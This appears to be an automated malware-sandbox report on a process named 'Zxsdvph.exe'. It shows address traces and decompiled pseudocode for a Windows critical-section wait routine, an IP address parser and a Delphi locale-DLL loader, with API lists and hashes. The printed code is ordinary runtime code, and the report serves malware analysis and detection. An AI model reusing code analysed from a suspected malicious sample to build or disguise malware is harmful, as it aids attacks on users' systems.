0x025b53bd
0x025b53be
0x025b53be
0x025b53be
0x025b53c0
0x00000000
0x00000000
0x025f2269
0x025f226d
0x025f2349
0x025f234d
0x025f2273
0x025f2276
0x025f2279
0x025f227e
0x025f2283
0x025f2287
0x025f228a
0x025f228d
0x025f228f
0x025f22bc
0x025f22bc
0x025f22bc
0x025f22be
0x025f22c4
0x025f22cc
0x025f22d0
0x025f22d6
0x025f22d7
0x025f22da
0x025f22df
0x025f22e4
0x00000000
0x00000000
0x025f22e6
0x025f22e9
0x025f22f4
0x025f22f9
0x025f22fa
0x025f2305
0x025f2314
0x025f2319
0x025f231a
0x025f231d
0x025f2320
0x025f2323
0x025f2323
0x025f2328
0x025f232d
0x025f232f
0x025f2331
0x025f2336
0x025f2336
0x025f233b
0x025f233d
0x025f2350
0x025f2351
0x025f2356
0x025f2359
0x025f2359
0x025f235b
0x025f235d
0x025b5367
0x025b536b
0x025b5372
0x00000000
0x00000000
0x00000000
0x00000000
0x025f2363
0x025f2363
0x025f2369
0x025f236a
0x025f236c
0x025f2371
0x025f2373
0x00000000
0x025f2379
0x025f2379
0x025f237a
0x025f237f
0x025f237f
0x025f2385
0x025f2386
0x025f2389
0x025f238e
0x025f2390
0x025b5378
0x025b537c
0x025f2396
0x025f2396
0x025f2397
0x025f239c
0x025f23a2
0x025f23a3
0x025f23a6
0x025f23ab
0x025f23ad
0x00000000
0x025f23b3
0x025f23b3
0x025f23b4
0x025f23b9
0x025f23ba
0x025f23ba
0x025f23bc
0x025f23bf
0x00000000
0x00000000
0x025e9153
0x025e9158
0x025e915a
0x025e915e
0x025e9160
0x00000000
0x025e9166
0x025e9166
0x025e9171
0x025e9176
0x025e9176
0x00000000
0x025e9160
0x025f23c6
0x025f23cb
0x025f23d7
0x025f23d7
0x025f23ad
0x025f2390
0x025f2373
0x025f233f
0x025f233f
0x00000000
0x025f233f
0x025f2291
0x025f2291
0x025f2293
0x025f2295
0x025f229a
0x025f22a1
0x025f22a3
0x025f22a7
0x025f22a9
0x00000000
0x00000000
0x025f22ab
0x025f22ad
0x025f22af
0x00000000
0x00000000
0x00000000
0x025f22af
0x025f22b1
0x025f22b4
0x025f22b4
0x025f22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x025f22b6
0x025f228f
0x00000000
0x025f226d
0x025b53cb
0x025b53ce
0x025b53d0
0x025b53d4
0x025b53d6
0x00000000
0x025b53d8
0x025b53e3
0x025b53ea
0x025b53ea
0x025b53d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F22F4

Strings

RTL: Re-Waiting, xrefs: 025F2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025F22FC
RTL: Resource at %p, xrefs: 025F230B

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
Instruction ID: 007e2638ed58a02b8f00de3d383e54a996029c942ba36c206b65ec32ec6c149f
Opcode Fuzzy Hash: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
Instruction Fuzzy Hash: E751F8B16116066BEF15DF68CC80FA67799FF88324F104659FD19DB280F761E8418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 025BEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E025BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E025ADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x267793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025916C0(_t39);
				} else {
					_t40 = E0258F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E025D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x267793c; // 0x0
								_push(_t85);
								_t44 = E02591F28(_t71);
							} else {
								_t44 = E0258F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E025D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02612306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E025BEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E025D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E025E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E025E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26720c0;
								if(_t85 != 0x26720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0261217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E025E3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x025bec56
0x025bec56
0x025bec56
0x025bec5c
0x025bec64
0x025f23e6
0x025f23eb
0x025f23eb
0x025bec6a
0x025bec6c
0x025bec6f
0x025f23f3
0x025f23f8
0x025f23fa
0x025f23fc
0x025bec75
0x025bec76
0x025bec76
0x025bec7b
0x025bec7c
0x025bec7e
0x025f2406
0x025f2407
0x025f240c
0x025f240d
0x025f240d
0x025f240d
0x025f2414
0x025f2417
0x025f241e
0x025f2435
0x025f2438
0x025f243c
0x025f243f
0x025f2442
0x025f2443
0x025f2446
0x025f2449
0x025f2453
0x025f2455
0x025f245b
0x025f245b
0x025beb99
0x025beb99
0x025beb9c
0x025beb9d
0x025beb9f
0x025beba2
0x025f2465
0x025f246b
0x025f246d
0x025beba8
0x025beba9
0x025beba9
0x025bebae
0x025bebb3
0x025bebb9
0x025bebbb
0x025f2513
0x025f2514
0x025f2519
0x025f251b
0x025bec2a
0x025bec2d
0x025bec33
0x025bec36
0x025bec3a
0x025bec3e
0x025bec40
0x025bec47
0x025bec47
0x025bec40
0x025922c6
0x025bebc1
0x025bebc1
0x025bebc5
0x025bec9a
0x025bec9a
0x025bebd6
0x025bebd6
0x00000000
0x025bebbb
0x025f2477
0x025f247c
0x025f2486
0x025f248b
0x025f2496
0x025f249b
0x025f249d
0x025f24a0
0x025f24a3
0x025f24aa
0x025f24aa
0x025f24a5
0x025f24a5
0x025f24a5
0x025f24ac
0x025f24af
0x025f24b0
0x025f24b3
0x025f24b9
0x025f24ba
0x025f24bb
0x025f24c6
0x025f24cb
0x025f24cd
0x025f24d0
0x025f24d1
0x025f24d4
0x025f24d6
0x025f24d9
0x025f24d9
0x025f24dc
0x025f24df
0x025f24e1
0x025f24e7
0x025f24e9
0x025f24ec
0x025f24ef
0x025f24f2
0x025f24f2
0x025f24ef
0x025f24e7
0x025f24fa
0x025f24ff
0x025f2501
0x025f2503
0x025f2506
0x025f250b
0x025beb8c
0x025beb93
0x00000000
0x00000000
0x025beb93
0x00000000
0x025beb99
0x025bec85
0x025bec85
0x025bec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 025F24FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 025F248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025F24BD

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
Instruction ID: 10391aab37d86ac0652d09d32415b239b22b634e75c2ce8edc16df85a81aa95b
Opcode Fuzzy Hash: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
Instruction Fuzzy Hash: 0441EDB0600205ABDB24DF64CC89FAA77A9FF84720F148A05F959DB2C0D774E941CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 025CFCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E025CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E025CEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E025CEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E025C685D(_t167, 4) == 0) {
								if(E025C685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E025C685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E025C685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E025A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0259DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E025CEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E025CEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x025cfcd1
0x025cfcd6
0x025cfcd9
0x025cfcdc
0x025cfcdf
0x025cfce2
0x025cfce5
0x025cfce8
0x025cfceb
0x025cfced
0x025cfced
0x025cfcf3
0x00000000
0x00000000
0x025cfcfc
0x025cfcfe
0x025cfdc1
0x025fecbd
0x00000000
0x025feccc
0x025feccc
0x025fecd2
0x00000000
0x00000000
0x025fecdf
0x025fece0
0x025fece4
0x025feceb
0x025fecee
0x025feca8
0x025feca8
0x025fecaa
0x025cfd76
0x025cfd79
0x025cfdb4
0x025cfdb5
0x025cfdb6
0x00000000
0x025cfdb6
0x025cfd7e
0x025fecfc
0x025cfe2f
0x00000000
0x025cfe2f
0x025fed08
0x025fed0f
0x025fed17
0x025fed1b
0x00000000
0x025fed1b
0x025cfd88
0x00000000
0x00000000
0x025cfd94
0x025cfd99
0x025cfda1
0x00000000
0x00000000
0x025cfdb0
0x00000000
0x025cfdb0
0x025fecbd
0x025cfdc7
0x025cfdcb
0x00000000
0x025cfdd7
0x025cfde3
0x025cfe06
0x025e1fe7
0x00000000
0x00000000
0x025e1fef
0x025e1ff0
0x025e1ff4
0x025e1ff7
0x025e1ffa
0x025e1ffd
0x025e2000
0x00000000
0x00000000
0x025fecf1
0x00000000
0x025fecf1
0x00000000
0x025cfe06
0x025cfde8
0x025cfdec
0x025cfdef
0x025cfdf2
0x00000000
0x025cfdf2
0x025cfdcb
0x025cfd04
0x025cfd05
0x025fec67
0x00000000
0x00000000
0x025fec6f
0x00000000
0x025fec6f
0x025cfd13
0x025cfd3c
0x025cfd40
0x025fec75
0x025fec7a
0x00000000
0x025fec8a
0x025fec8a
0x025fec90
0x025fecb2
0x025cfd73
0x025cfd73
0x00000000
0x025cfd73
0x025fec95
0x00000000
0x00000000
0x025feca1
0x025feca4
0x025feca5
0x00000000
0x025feca5
0x025fec7a
0x025cfd4a
0x00000000
0x025cfd6e
0x025cfd6e
0x025cfd71
0x00000000
0x025cfd71
0x025cfd4a
0x025cfd21
0x025da3a1
0x00000000
0x025da3a1
0x025cfd36
0x025e200b
0x025e2012
0x00000000
0x00000000
0x025e2018
0x00000000
0x025e2018
0x00000000
0x025cfd36
0x025cfe0f
0x025cfe16
0x025da3ad
0x00000000
0x00000000
0x025da3b3
0x025da3b3
0x025cfe1f
0x025fed25
0x025fed86
0x00000000
0x00000000
0x025fed91
0x025fed95
0x025fed95
0x025fed9a
0x025fedad
0x025fedb3
0x025fedba
0x025fedc4
0x025fedc9
0x00000000
0x025fedcc
0x025fed2a
0x025fed55
0x00000000
0x00000000
0x025fed61
0x025fed66
0x025fed6e
0x00000000
0x00000000
0x025fed7d
0x00000000
0x025fed7d
0x025fed30
0x00000000
0x00000000
0x025fed3c
0x025fed43
0x025fed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 025CFD94

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: dbb6071de25c8a600b18edfe1c75d2887b874fa438560ba4d7020d93dc6c19fc
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 7E918B71D0020AEFDF65CF98C8456AEBBB6FB85309F30846FD405A6591F7304A81CB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Zxsdvph.exe PID: 2680 Parent PID: 1764 Zxsdvph.exeCOMMON

Executed Functions

Function 00405C7C, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00405C7C(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char* _v32;
				char _v293;
				long _t58;
				long _t75;
				long _t77;
				CHAR* _t84;
				CHAR* _t87;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t101;
				struct HINSTANCE__* _t110;
				intOrPtr _t115;
				void* _t124;
				void* _t126;
				intOrPtr _t127;

				_t124 = _t126;
				_t127 = _t126 + 0xfffffedc;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v293, 0x105);
				_v22 = 0;
				_t58 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t58 == 0) {
					L3:
					_push(_t124);
					_push(0x405d80);
					_push( *[fs:eax]);
					 *[fs:eax] = _t127;
					_v28 = 5;
					E00405AA4( &_v293, 0x105);
					if(RegQueryValueExA(_v12,  &_v293, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EFC, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E00405D87);
					return RegCloseKey(_v12);
				} else {
					_t75 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t75 == 0) {
						goto L3;
					} else {
						_t77 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t77 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v293);
							L00401350();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t110 = 0;
							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t84 =  &_v293;
								_push(_t84);
								L00401358();
								_v32 = _t84 +  &_v293;
								while( *_v32 != 0x2e &&  &_v293 != _v32) {
									_v32 = _v32 - 1;
								}
								_t87 =  &_v293;
								if(_t87 != _v32) {
									_v32 = _v32 + 1;
									if(_v22 != 0) {
										_push(0x105 - _v32 - _t87);
										_push( &_v22);
										_push(_v32);
										L00401350();
										_t110 = LoadLibraryExA( &_v293, 0, 2);
									}
									if(_t110 == 0 && _v17 != 0) {
										_push(0x105 - _v32 -  &_v293);
										_push( &_v17);
										_push(_v32);
										L00401350();
										_t94 = LoadLibraryExA( &_v293, 0, 2); // executed
										_t110 = _t94;
										if(_t110 == 0) {
											_v15 = 0;
											_push(0x105 - _v32 -  &_v293);
											_push( &_v17);
											_push(_v32);
											L00401350();
											_t101 = LoadLibraryExA( &_v293, 0, 2); // executed
											_t110 = _t101;
										}
									}
								}
							}
							return _t110;
						} else {
							goto L3;
						}
					}
				}
			}

0x00405c7d
0x00405c7f
0x00405c86
0x00405c97
0x00405c9c
0x00405cb5
0x00405cbc
0x00405cfe
0x00405d00
0x00405d01
0x00405d06
0x00405d09
0x00405d0c
0x00405d1e
0x00405d41
0x00405d61
0x00405d61
0x00405d65
0x00405d6b
0x00405d6e
0x00405d71
0x00405d7f
0x00405cbe
0x00405cd3
0x00405cda
0x00000000
0x00405cdc
0x00405cf1
0x00405cf8
0x00405d87
0x00405d8f
0x00405d96
0x00405d97
0x00405daa
0x00405daf
0x00405db8
0x00405dce
0x00405dd4
0x00405dd5
0x00405de2
0x00405dea
0x00405de7
0x00405de7
0x00405dfd
0x00405e06
0x00405e0c
0x00405e13
0x00405e21
0x00405e25
0x00405e29
0x00405e2a
0x00405e3f
0x00405e3f
0x00405e43
0x00405e5d
0x00405e61
0x00405e65
0x00405e66
0x00405e76
0x00405e7b
0x00405e7f
0x00405e81
0x00405e97
0x00405e9b
0x00405e9f
0x00405ea0
0x00405eb0
0x00405eb5
0x00405eb5
0x00405e7f
0x00405e43
0x00405e06
0x00405ebd
0x00000000
0x00000000
0x00000000
0x00405cf8
0x00405cda

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,004A00A4), ref: 00405C97
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CB5
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CD3
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CF1
RegQueryValueExA.ADVAPI32 ref: 00405D3A
RegQueryValueExA.ADVAPI32 ref: 00405D58
RegCloseKey.ADVAPI32(?), ref: 00405D7A
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D97
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA4
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DAA
lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD5
lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E2A
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E3A
lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E66
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E76
lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00405EA0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00405EB0

Strings

Software\Borland\Locales, xrefs: 00405CAB, 00405CC9
Software\Borland\Delphi\Locales, xrefs: 00405CE7

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: c16b275fc0c024c28089fba46fe3dc127163d86ee6490ba1d6328cb7c663bdf2
Instruction ID: a5fbd762a9c0376b77a18339bd1da6d2248b2361ced8cd3053c0c48bd3aa9a6e
Opcode Fuzzy Hash: c16b275fc0c024c28089fba46fe3dc127163d86ee6490ba1d6328cb7c663bdf2
Instruction Fuzzy Hash: 53613D71A046097EEB14DAE4CC46FEF77BCDB48704F5040A6BA45F25C1D6B89A448FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00466698, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 399
COMMON

Download Yara Rule

